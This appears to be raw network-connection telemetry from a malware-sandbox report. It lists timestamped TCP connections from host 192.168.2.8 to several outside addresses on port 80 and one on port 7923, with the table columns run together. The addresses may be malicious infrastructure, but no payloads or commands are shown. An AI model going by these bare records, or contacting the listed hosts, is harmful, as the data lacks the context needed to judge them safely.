                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.567498922 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571052074 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571122885 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571266890 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571294069 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.576128960 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.576145887 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240771055 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240838051 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240896940 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.245820045 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.255470037 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.260349989 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.260415077 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261008024 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261022091 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.265850067 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.265916109 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.913611889 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.913983107 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.914072037 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.918792009 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.946083069 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.950913906 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951155901 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951155901 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951333046 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.955967903 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.956038952 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.006846905 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.007025957 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.012343884 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.012396097 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.154443026 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.159435034 CET804971854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.160464048 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.160603046 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.160624027 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.165683031 CET804971854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.165700912 CET804971854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.989990950 CET804971854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.990221977 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.995481968 CET804971854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.995536089 CET4971880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.038784027 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.054323912 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.060472012 CET804972118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.061407089 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.061543941 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.061563969 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.067518950 CET804972118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.067533016 CET804972118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.102658033 CET4972280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107686043 CET804972244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107768059 CET4972280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107912064 CET4972280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107944965 CET4972280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.112832069 CET804972244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.112843990 CET804972244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.210593939 CET4972280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.256450891 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261567116 CET804972344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261640072 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261915922 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261960030 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.266788006 CET804972344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.266860008 CET804972344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.914427042 CET804972344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.932729006 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.938155890 CET804972344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.938302994 CET4972380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.172671080 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.177812099 CET8049725172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.177941084 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.221102953 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.221147060 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.225980997 CET8049725172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.225994110 CET8049725172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.494748116 CET804972118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.516881943 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.522116899 CET804972118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.522171021 CET4972180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.732294083 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.737127066 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.737210989 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.846169949 CET8049725172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.846232891 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.886517048 CET4972580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.891463041 CET8049725172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.501996040 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.620318890 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669127941 CET804972882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669140100 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669200897 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669260025 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669454098 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669485092 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669609070 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669661045 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.674190998 CET804972882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.674212933 CET804972882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.674386978 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.674532890 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.245718002 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.250691891 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.332191944 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.332328081 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.336797953 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.341605902 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.815197945 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.820180893 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.820291042 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843611002 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843650103 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.848529100 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.848540068 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.028588057 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.050004959 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.054908991 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.055898905 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.060893059 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.060903072 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.270754099 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.304816961 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.310446978 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.310516119 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.401175022 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.513763905 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.513858080 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514158964 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514182091 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.518970013 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.518981934 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.023384094 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.053298950 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058312893 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058415890 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058592081 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058623075 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.063371897 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.063383102 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:40.212666035 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:40.288543940 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.065002918 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.228883028 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.233781099 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.233850002 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.245234013 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.245357990 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:45.746051073 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:45.750983000 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.001431942 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.001507044 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.002249002 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.008706093 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.016417980 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.018377066 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.025037050 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.132632017 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.137561083 CET804973682.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138307095 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138474941 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138494968 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.143378973 CET804973682.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.143395901 CET804973682.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.034313917 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.057646036 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.062876940 CET804973747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.062939882 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.063050985 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.063070059 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.068192959 CET804973747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.068209887 CET804973747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.209208965 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.393254042 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398020983 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398088932 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398230076 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398248911 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.403034925 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.403045893 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.554986954 CET804973747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.555332899 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.560363054 CET804973747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.561609030 CET4973780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.598476887 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603300095 CET804973913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603389025 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603535891 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.603569031 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.608928919 CET804973913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.608938932 CET804973913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.029498100 CET804973913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.029660940 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.034904003 CET804973913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.034980059 CET4973980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.064809084 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070065975 CET804974044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070132971 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070266008 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.070282936 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.075299025 CET804974044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.076025009 CET804974044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.766902924 CET804974044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.768424034 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.774179935 CET804974044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.776536942 CET4974080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.807137966 CET4974180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.812078953 CET804974118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.813905001 CET4974180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.814048052 CET4974180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.814078093 CET4974180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.818875074 CET804974118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.818890095 CET804974118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.033947945 CET4974180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.050997972 CET4974280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056056976 CET804974218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056406021 CET4974280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056709051 CET4974280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.056787014 CET4974280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.061638117 CET804974218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:51.061654091 CET804974218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.493208885 CET804974218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.493509054 CET4974280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.498967886 CET804974218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.499058008 CET4974280192.168.2.818.141.10.107
